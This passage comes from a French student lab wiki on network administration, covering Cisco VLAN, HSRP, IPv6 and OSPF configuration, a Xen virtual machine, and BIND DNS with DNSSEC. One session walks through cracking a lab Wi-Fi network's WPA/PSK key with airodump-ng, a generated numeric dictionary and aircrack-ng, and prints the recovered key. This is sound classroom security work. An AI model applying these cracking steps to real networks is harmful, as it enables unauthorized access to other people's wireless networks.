  Te0/2                        notconnect   1          full      10G     10GBase-SR             // vers cordouan&lt;br /&gt;
&lt;br /&gt;
Afin d'accélérer la communication entre le routeur et le commutateur, les ports 1 à 10 du routeur seront connectés au commutateur. &lt;br /&gt;
&lt;br /&gt;
  Router(config)#configure terminal&lt;br /&gt;
  Enter configuration commands, one per line.  End with CNTL/Z.&lt;br /&gt;
  Router(config)#interface range Gi0/1 - 11&lt;br /&gt;
  Switch(config-if)#switchport mode access&lt;br /&gt;
  Switch(config-if)#switchport access access trunk                                       &lt;br /&gt;
  Switch(config-if)#exit&lt;br /&gt;
&lt;br /&gt;
Configuration de l'interface 10G vers le local SR52&lt;br /&gt;
  &lt;br /&gt;
  Router(config)#configure terminal&lt;br /&gt;
  Enter configuration commands, one per line.  End with CNTL/Z.&lt;br /&gt;
  Router(config)#interface Te0/1&lt;br /&gt;
  Switch(config-if)#switchport mode access&lt;br /&gt;
  Switch(config-if)#switchport access access vlan 131                                       // vlan 131 (interconnexion IMA5)&lt;br /&gt;
  Switch(config-if)#exit&lt;br /&gt;
&lt;br /&gt;
Configuration de l'interface 10G vers Cordouan&lt;br /&gt;
  &lt;br /&gt;
  Router(config)#configure terminal&lt;br /&gt;
  Enter configuration commands, one per line.  End with CNTL/Z.&lt;br /&gt;
  Router(config)#interface Te0/2&lt;br /&gt;
  Switch(config-if)#switchport mode access&lt;br /&gt;
  Switch(config-if)#switchport access access vlan 43                                       // vlan 43 (XEN IMA5)&lt;br /&gt;
  Switch(config-if)#exit&lt;br /&gt;
&lt;br /&gt;
PROBLEME : &lt;br /&gt;
&lt;br /&gt;
  *Mar  1 01:42:30.518: %CDP-4-NATIVE_VLAN_MISMATCH: Native VLAN mismatch discovered on TenGigabitEthernet0/2 (43), with Switch GigabitEthernet3/2 (42).&lt;br /&gt;
&lt;br /&gt;
A FAIRE : &lt;br /&gt;
&lt;br /&gt;
*configurer les interfaces / BDI&lt;br /&gt;
&lt;br /&gt;
====Mise en place de la machine virtuelle====&lt;br /&gt;
Notre machine virtuelle a les paramètres suivants : &lt;br /&gt;
&lt;br /&gt;
-Hostname = Dionysos&lt;br /&gt;
&lt;br /&gt;
-@IP = 193.48.57.178&lt;br /&gt;
&lt;br /&gt;
-Netmask = 255.255.255.240&lt;br /&gt;
&lt;br /&gt;
-dossier = /usr/local/xen&lt;br /&gt;
  &lt;br /&gt;
  xen-create-image --hostname=Dionysos --ip=193.48.57.178 --netmask=255.255.255.240 --dir=/usr/local/xen&lt;br /&gt;
&lt;br /&gt;
Dans le répertoire /etc/xen, nous modifions le fichier Dionysos.cfg. &lt;br /&gt;
&lt;br /&gt;
Nous adaptons le bridge StudentsInfo, qui devient IMA5sc.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Puis nous lançons une instance de la VM&lt;br /&gt;
&lt;br /&gt;
 xl create Dionysos.cfg&lt;br /&gt;
 xl console Dionysos&lt;br /&gt;
&lt;br /&gt;
Connexion à la VM, avec le login root, mot de passe fourni a la fin de l'installation &lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/ssh/sshd_config nous décommentons la ligne : &lt;br /&gt;
  PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
Ainsi nous pouvons nous connecter en ssh sur notre VM&lt;br /&gt;
&lt;br /&gt;
Pour que le système soit connecté dans /etc/network/interfaces nous ajoutons la gateway.&lt;br /&gt;
  gateway 193.48.57.190&lt;br /&gt;
&lt;br /&gt;
 ip route add default via 193.48.57.190 dev eth0 onlink&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Nous avons modifié le mot de passe initial.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour éteindre une VM&lt;br /&gt;
  &lt;br /&gt;
 xl shutdown Dionysos&lt;br /&gt;
&lt;br /&gt;
===Séance 3 : 10/12/2018===&lt;br /&gt;
&lt;br /&gt;
====Config Routeur 3560====&lt;br /&gt;
&lt;br /&gt;
*Commande pour save la configuration&lt;br /&gt;
&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
Correction sur la config du routeur&lt;br /&gt;
&lt;br /&gt;
*Vers le commutateur 4006 - 10 cables 1G (Notre Salle)&lt;br /&gt;
 &lt;br /&gt;
 enable&lt;br /&gt;
 conf t&lt;br /&gt;
 interface range Gi0/1 - 10&lt;br /&gt;
 switchport&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode trunk&lt;br /&gt;
 exit&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
*Vers le commutateur 6000 - 1 cable 1G (Autre Salle)&lt;br /&gt;
&lt;br /&gt;
 enable&lt;br /&gt;
 conf t&lt;br /&gt;
 interface gi0/11&lt;br /&gt;
 switchport&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode trunk&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
*Vers Cordouan - cable 10G (Fibre)&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 interface Te0/2&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode access&lt;br /&gt;
 switchport access vlan 43                                       // vlan 43 (XEN IMA5)&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Vers le local SR52&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 interface Te0/1&lt;br /&gt;
 switchport trunk encapsulation dot1q&lt;br /&gt;
 switchport mode access&lt;br /&gt;
 switchport access vlan 131                                       // vlan 131 (interconnexion IMA5)&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Le vlan M = 10 + N (Groupe N)&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 int vlanM&lt;br /&gt;
 ip address 10.60.M.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby M ip 10.60.M.254&lt;br /&gt;
 standby M preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60CN eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60CN::/64 1000 9000&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Le vlan 43 (IM5sc)&lt;br /&gt;
&lt;br /&gt;
 int vlan43&lt;br /&gt;
 ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 22 ip 193.48.57.190&lt;br /&gt;
 standby 22 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60C0 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C0::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Le vlan 131 (Interconnexion)&lt;br /&gt;
 &lt;br /&gt;
 int vlan 131&lt;br /&gt;
 ip address 192.168.222.9 255.255.255.248         &lt;br /&gt;
 ipv6 address fe80::2 link-local                  &lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 rip tpima2a5 enable                        &lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
*Nommer un VLANs&lt;br /&gt;
&lt;br /&gt;
 vlan M&lt;br /&gt;
 name groupeN&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
 vlan 43&lt;br /&gt;
 name Xen&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
 vlan 131&lt;br /&gt;
 name interconnexion&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 ip routing&lt;br /&gt;
 exit                &lt;br /&gt;
 show ip route      &lt;br /&gt;
 Codes: C - connected, S - static, R - RIP, M - mobile, B - BGP&lt;br /&gt;
        D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area &lt;br /&gt;
        N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2&lt;br /&gt;
        E1 - OSPF external type 1, E2 - OSPF external type 2&lt;br /&gt;
        i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2&lt;br /&gt;
        ia - IS-IS inter area, * - candidate default, U - per-user static route&lt;br /&gt;
        o - ODR, P - periodic downloaded static route&lt;br /&gt;
 &lt;br /&gt;
 Gateway of last resort is not set&lt;br /&gt;
 &lt;br /&gt;
      193.48.57.0/28 is subnetted, 1 subnets&lt;br /&gt;
 C       193.48.57.176 is directly connected, Vlan43&lt;br /&gt;
      10.0.0.0/24 is subnetted, 11 subnets&lt;br /&gt;
 C       10.60.20.0 is directly connected, Vlan20&lt;br /&gt;
 C       10.60.21.0 is directly connected, Vlan21&lt;br /&gt;
 C       10.60.18.0 is directly connected, Vlan18&lt;br /&gt;
 C       10.60.19.0 is directly connected, Vlan19&lt;br /&gt;
 C       10.60.16.0 is directly connected, Vlan16&lt;br /&gt;
 C       10.60.17.0 is directly connected, Vlan17&lt;br /&gt;
 C       10.60.14.0 is directly connected, Vlan14&lt;br /&gt;
 C       10.60.15.0 is directly connected, Vlan15&lt;br /&gt;
 C       10.60.12.0 is directly connected, Vlan12&lt;br /&gt;
 C       10.60.13.0 is directly connected, Vlan13&lt;br /&gt;
 C       10.60.11.0 is directly connected, Vlan11&lt;br /&gt;
      192.168.222.0/29 is subnetted, 1 subnets&lt;br /&gt;
 C       192.168.222.8 is directly connected, Vlan131&lt;br /&gt;
&lt;br /&gt;
* OSPF&lt;br /&gt;
&lt;br /&gt;
 Switch(config)#router ospf 1        &lt;br /&gt;
 Switch(config-router)#router-id 10.60.11.252 &lt;br /&gt;
 Switch(config-router)#summary-address 193.48.57.176 255.255.255.240&lt;br /&gt;
 Switch(config-router)#redistribute connected subnets &lt;br /&gt;
 Switch(config-router)#summary-address 192.168.0.0 255.255.255.0 not-advertise&lt;br /&gt;
 Switch(config-router)#summary-address 10.60.0.0 255.255.0.0 not-advertise    &lt;br /&gt;
 Switch(config-router)#network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
 Switch(config-router)#exit&lt;br /&gt;
&lt;br /&gt;
====Mise en place des partitions pour la VM====&lt;br /&gt;
Sur cordouan&lt;br /&gt;
&lt;br /&gt;
  lvcreate -L10G -nIMA5_Dionysos_var virtual&lt;br /&gt;
  lvcreate -L10G -nIMA5_Dionysos_home virtual&lt;br /&gt;
  &lt;br /&gt;
  &lt;br /&gt;
  mke2fs /dev/virtual/IMA5_Dionysos_var&lt;br /&gt;
  mke2fs /dev/virtual/IMA5_Dionysos_home&lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/xen/Dionysos.cfg&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/swap.img,xvda1,w&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_var,xvdb2,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5_Dionysos_home,xvdb1,w',&lt;br /&gt;
               ]&lt;br /&gt;
&lt;br /&gt;
Sur la VM, dans le fichier /etc/fstab&lt;br /&gt;
  /dev/xvdb1 /home ext4 defaults 0 3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Le cas du répertoire /var est plus complexe. &lt;br /&gt;
&lt;br /&gt;
Si nous utilisons la même méthode que pour /home, nous perdrons le /var. Nous ne pourrions donc plus utiliser apt-get, par exemple.&lt;br /&gt;
&lt;br /&gt;
Dans la VM, dans le fichier /etc/fstab&lt;br /&gt;
  /dev/xvdb2 /mnt ext4 defaults 0 2&lt;br /&gt;
&lt;br /&gt;
Puis dans le terminal de la VM&lt;br /&gt;
  mount /dev/xvdb2 /mnt &lt;br /&gt;
  mv /var/* /mnt/&lt;br /&gt;
  unmount /mnt&lt;br /&gt;
  mount -a&lt;br /&gt;
&lt;br /&gt;
Via la commande df nous contrôlons le résultat.&lt;br /&gt;
   Filesystem     1K-blocks    Used Available Use% Mounted on&lt;br /&gt;
   ...                  ...     ...       ...  ... ...&lt;br /&gt;
   /dev/xvdb1      10255636   36888   9678076   1% /home&lt;br /&gt;
   /dev/xvdb2      10321208   23028   9773892   1% /var&lt;br /&gt;
&lt;br /&gt;
====Mise en place serveur DNS====&lt;br /&gt;
Utilisation de la méthode bind&lt;br /&gt;
&lt;br /&gt;
Dans le répertoire /etc/bind, nous modifirons les trois fichiers suivants :&lt;br /&gt;
&lt;br /&gt;
named.conf.options&lt;br /&gt;
&lt;br /&gt;
  options {&lt;br /&gt;
        directory &amp;quot;/var/cache/bind&amp;quot;;&lt;br /&gt;
  &lt;br /&gt;
        // If there is a firewall between you and nameservers you want&lt;br /&gt;
        // to talk to, you may need to fix the firewall to allow multiple&lt;br /&gt;
        // ports to talk.  See http://www.kb.cert.org/vuls/id/800113&lt;br /&gt;
  &lt;br /&gt;
        // If your ISP provided one or more IP addresses for stable&lt;br /&gt;
        // nameservers, you probably want to use them as forwarders.&lt;br /&gt;
        // Uncomment the following block, and insert the addresses replacing&lt;br /&gt;
        // the all-0's placeholder.&lt;br /&gt;
  &lt;br /&gt;
        // forwarders {&lt;br /&gt;
        //   0.0.0.0;&lt;br /&gt;
        // };&lt;br /&gt;
  &lt;br /&gt;
        //========================================================================&lt;br /&gt;
        // If BIND logs error messages about the root key being expired,&lt;br /&gt;
        // you will need to update your keys.  See https://www.isc.org/bind-keys&lt;br /&gt;
        //========================================================================&lt;br /&gt;
  &lt;br /&gt;
        //Mise en place du DNSSEC&lt;br /&gt;
        dnssec-enable yes;&lt;br /&gt;
  &lt;br /&gt;
        dnssec-validation auto;&lt;br /&gt;
  &lt;br /&gt;
        auth-nxdomain no;&lt;br /&gt;
        listen-on-v6 { any; };&lt;br /&gt;
        allow-recursion{localhost;};&lt;br /&gt;
  };&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
named.conf.local&lt;br /&gt;
&lt;br /&gt;
  zone &amp;quot;dionysos.space&amp;quot;{&lt;br /&gt;
        type master;&lt;br /&gt;
        file &amp;quot;/etc/bind/db.dionysos.space&amp;quot;;&lt;br /&gt;
        allow-transfer{217.70.177.40;}; //Autorisation transfert vers ns6.gandi.net&lt;br /&gt;
  };&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Puis nous créons le fichier /etc/bind/db.dionysos.space&lt;br /&gt;
  cp db.local db.dionysos.space &lt;br /&gt;
&lt;br /&gt;
Dans ce fichier nous entrons les paramètres suivants&lt;br /&gt;
&lt;br /&gt;
  ;&lt;br /&gt;
  ; BIND data file for local loopback interface&lt;br /&gt;
  ;&lt;br /&gt;
  $TTL    604800&lt;br /&gt;
  $include /root/SSL_certif/dionysos-ksk.key&lt;br /&gt;
  $include /root/SSL_certif/dionysos-zsk.key&lt;br /&gt;
  &lt;br /&gt;
  @       IN      SOA     ns.dionysos.space. root.dionysos.space (&lt;br /&gt;
                                2         ; Serial&lt;br /&gt;
                           604800         ; Refresh&lt;br /&gt;
                            86400         ; Retry&lt;br /&gt;
                          2419200         ; Expire&lt;br /&gt;
                           604800 )       ; Negative Cache TTL&lt;br /&gt;
  ;&lt;br /&gt;
          IN      NS      ns.dionysos.space. ;dns principal&lt;br /&gt;
          IN      NS      ns6.gandi.net.     ;dns secondaire&lt;br /&gt;
  @       IN      A       193.48.57.178      ;acces sans le &amp;quot;www.&amp;quot;&lt;br /&gt;
  ns      IN      NS      193.48.57.178      ;acces avec http https&lt;br /&gt;
  www     IN      A       193.48.57.178;     ;acces avec le &amp;quot;www.&lt;br /&gt;
&lt;br /&gt;
====Certificat SSL====&lt;br /&gt;
  &lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
  openssl req -nodes -newkey rsa:2048 -sha1 -keyout dionysos.space.key -out dionysos.space.csr&lt;br /&gt;
  ...&lt;br /&gt;
  Common Name (e.g. server FQDN or YOUR name) []:dionysos.space et dionysos.space.key&lt;br /&gt;
  Email Address []:qboens@polytech-lille.net&lt;br /&gt;
&lt;br /&gt;
Cette opération génére deux fichiers : dionysos.space.crt et dionysos.space.key&lt;br /&gt;
&lt;br /&gt;
Une fois cette étape faite on récupére sur gandi GandiStandardSSLCA2.pem, dans l'onglet du certificat.&lt;br /&gt;
&lt;br /&gt;
Tous les fichiers sont placés dans le répertoire SSL_certif&lt;br /&gt;
  mv dionysos.space.csr SSL_certif&lt;br /&gt;
  mv dionysos.space.key SSL_certif&lt;br /&gt;
  mv GandiStandardSSLCA2.pem SSL_certif&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====Installation de DNSSEC====&lt;br /&gt;
&lt;br /&gt;
Création de la clef KSK&lt;br /&gt;
  dnssec-keygen -a RSASHA1 -b 2048 -f KSK -r /dev/urandom -n ZONE dionysos.space&lt;br /&gt;
&lt;br /&gt;
Création de la clef ZSK&lt;br /&gt;
  dnssec-keygen -a RSASHA1 -b 1024 -r /dev/urandom -n ZONE dionysos.space&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Ces clefs ont été crées dans le dossier SSL_certif&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Création d'un fichier signé à partir de db.dionysos.space&lt;br /&gt;
  dnssec-signzone -o dionysos.space -k dionysos-ksk.key /etc/bind/db.dionysos.space dionysos-zsk.key &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Dans named.conf.local nous changons le fichier cible, pour que bind9 prenne en compte db.dionysos.space.signed, qui est le fichier signé&lt;br /&gt;
  zone &amp;quot;dionysos.space&amp;quot;{&lt;br /&gt;
        type master;&lt;br /&gt;
        file &amp;quot;/etc/bind/db.dionysos.space.signed&amp;quot;;&lt;br /&gt;
        allow-transfer{217.70.177.40;}; //Autorisation transfert vers ns6.gandi.net&lt;br /&gt;
  };&lt;br /&gt;
&lt;br /&gt;
Puis nous relançons bind9&lt;br /&gt;
  service bind9 restart&lt;br /&gt;
&lt;br /&gt;
Sur le site gandi nous ajoutons les deux clefs, dans l'onglet DNSSEC&lt;br /&gt;
&lt;br /&gt;
Un bon moyen de contrôler le déploiement de nos clefs : [http://dnsviz.net/]&lt;br /&gt;
&lt;br /&gt;
===Séance 3.5 : 14/12/2018===&lt;br /&gt;
&lt;br /&gt;
====Craquage WPA/PSK par dictionnaire====&lt;br /&gt;
&lt;br /&gt;
Materiel utilisé :&lt;br /&gt;
&lt;br /&gt;
* un PC portable&lt;br /&gt;
* une clé Wi-Pi (nécessaire pour le PC portable que nous avons utilisé pour la partie handshake)&lt;br /&gt;
* Zabeth13 pour le craquage&lt;br /&gt;
&lt;br /&gt;
=====Récupération du handshake=====&lt;br /&gt;
&lt;br /&gt;
Premièrement sur le PC portable SOLE, &lt;br /&gt;
&lt;br /&gt;
 #ip a&lt;br /&gt;
&lt;br /&gt;
pour vérifier que nous disposons bien d'une interface wifi &amp;lt;code&amp;gt;wlx40a5ef0f68ce&amp;lt;/code&amp;gt;, puis nous l'utilisons pour écouter sur le wifi :&lt;br /&gt;
&lt;br /&gt;
 #airmon-ng start &amp;lt;nom_de_l'interface&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On récupère l'interface retournée, dans notre cas &amp;lt;code&amp;gt;wlan0mon&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 #airodump-ng wlan0mon&lt;br /&gt;
&lt;br /&gt;
On note l'ESSID de cracotte02 et son channel pour ensuite renvoyer dans des fichiers&lt;br /&gt;
&lt;br /&gt;
 #airodump-ng --bssid &amp;lt;ESSID cracotte02&amp;gt; wlan0mon --channel 9 --write FILENAME&lt;br /&gt;
&lt;br /&gt;
On dispose ensuite de 4 fichiers FILENAME.cap FILENAME.csv FILENAME.kismet.csv FILENAME.kismet.netxml&lt;br /&gt;
&lt;br /&gt;
On peut à présent transférer ces fichiers sur ZABETH13 via clé usb:&lt;br /&gt;
&lt;br /&gt;
=====Rappel montage USB=====&lt;br /&gt;
&lt;br /&gt;
 #fdisk -l                                                 //avant de brancher la clé USB&lt;br /&gt;
 #fdisk -l                                                 //on récupère l'emplacement de la clé (ex: /dev/sdb -&amp;gt; /dev/sdb1)&lt;br /&gt;
 #mkdir /media/MA_CLE_USB&lt;br /&gt;
 #mount /dev/sdb1 /media/MA_CLE_USB&lt;br /&gt;
 #mv /home/pifou/Mon_FICHIER /media/MA_CLE_USB             //répéter autant que nécessaire&lt;br /&gt;
 #umount /media/MA_CLE_USB&lt;br /&gt;
&lt;br /&gt;
=====Crack WPA/PSK=====&lt;br /&gt;
&lt;br /&gt;
On crée un petit programme &amp;lt;code&amp;gt;main.c&amp;lt;/code&amp;gt; pour lister tous les codes possibles, on sait qu'il s'agit d'un code de 8 chiffres&lt;br /&gt;
&lt;br /&gt;
 #include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
 #include &amp;lt;stdlib.h&amp;gt;&lt;br /&gt;
 &lt;br /&gt;
 int main(){&lt;br /&gt;
     int i;&lt;br /&gt;
     // key is 8 numeric digits&lt;br /&gt;
     for(i=0;i&amp;lt;99999999;i++){&lt;br /&gt;
         printf(&amp;quot;%d\n&amp;quot;,i);&lt;br /&gt;
     }&lt;br /&gt;
     return 0;&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
On compile et on stock dans un txt&lt;br /&gt;
&lt;br /&gt;
 #gcc main.c -o main -Wall&lt;br /&gt;
 #./main &amp;gt; dictionnaire.txt&lt;br /&gt;
&lt;br /&gt;
On peut à présent lancer le crack&lt;br /&gt;
&lt;br /&gt;
 #aircrack-ng FILENAME.cap -w dictionnaire.txt&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Fichier:crack-cracotte02.png]]&lt;br /&gt;
&lt;br /&gt;
Après un certains temps d'execution, on obtient la clé&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Found_key.png]]&lt;br /&gt;
&lt;br /&gt;
Clé : 42429902&lt;br /&gt;
===Séance 4 : 17/12/2018===&lt;br /&gt;
====Correction IPV6 routeur====&lt;br /&gt;
&lt;br /&gt;
===== Vlan 43 - XEN =====&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan43&lt;br /&gt;
 int vlan43&lt;br /&gt;
 ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 22 ip 193.48.57.190&lt;br /&gt;
 standby 22 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60C0::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C0::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
===== Vlan 131 - Interconnexion =====&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan 131&lt;br /&gt;
 int vlan 131&lt;br /&gt;
 ip address 192.168.222.9 255.255.255.248         &lt;br /&gt;
 ipv6 address fe80::2 link-local                  &lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 rip tpima2a5 enable                        &lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
===== Vlan 10+N - Groupe N =====&lt;br /&gt;
&lt;br /&gt;
'''IPv4'''&lt;br /&gt;
&lt;br /&gt;
* Notre Routeur : &amp;lt;code&amp;gt;10.60.10+N.252&amp;lt;/code&amp;gt;&lt;br /&gt;
* Routeur Virtuel : &amp;lt;code&amp;gt;10.60.10+N.254&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''IPv6'''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;2001:660:4401:60XX&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* VLAN 11 à 21 : &amp;lt;code&amp;gt;C1&amp;lt;/code&amp;gt; à &amp;lt;code&amp;gt;CB&amp;lt;/code&amp;gt;&lt;br /&gt;
* VLAN 43 : &amp;lt;code&amp;gt;C0&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Groupe 1&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan11&lt;br /&gt;
 int vlan11&lt;br /&gt;
 ip address 10.60.11.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 11 ip 10.60.11.254&lt;br /&gt;
 standby 11 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C1::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C1::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 11&lt;br /&gt;
 name groupe1&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 2&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan12&lt;br /&gt;
 int vlan12&lt;br /&gt;
 ip address 10.60.12.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 12 ip 10.60.12.254&lt;br /&gt;
 standby 12 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C2::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C2::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 12&lt;br /&gt;
 name groupe2&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 3&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan13&lt;br /&gt;
 int vlan13&lt;br /&gt;
 ip address 10.60.13.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 13 ip 10.60.13.254&lt;br /&gt;
 standby 13 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C3::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C3::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 13&lt;br /&gt;
 name groupe3&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 4&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan14&lt;br /&gt;
 int vlan14&lt;br /&gt;
 ip address 10.60.14.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 14 ip 10.60.14.254&lt;br /&gt;
 standby 14 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C4::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C4::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 14&lt;br /&gt;
 name groupe4&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 5&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan15&lt;br /&gt;
 int vlan15&lt;br /&gt;
 ip address 10.60.15.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 15 ip 10.60.15.254&lt;br /&gt;
 standby 15 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C5::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C5::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 15&lt;br /&gt;
 name groupe5&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 6&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan16&lt;br /&gt;
 int vlan16&lt;br /&gt;
 ip address 10.60.16.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 16 ip 10.60.16.254&lt;br /&gt;
 standby 16 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C6::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C6::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 16&lt;br /&gt;
 name groupe6&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 7&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan17&lt;br /&gt;
 int vlan17&lt;br /&gt;
 ip address 10.60.17.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 17 ip 10.60.17.254&lt;br /&gt;
 standby 17 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C7::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C7::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 17&lt;br /&gt;
 name groupe7&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 8&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan18&lt;br /&gt;
 int vlan18&lt;br /&gt;
 ip address 10.60.18.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 18 ip 10.60.18.254&lt;br /&gt;
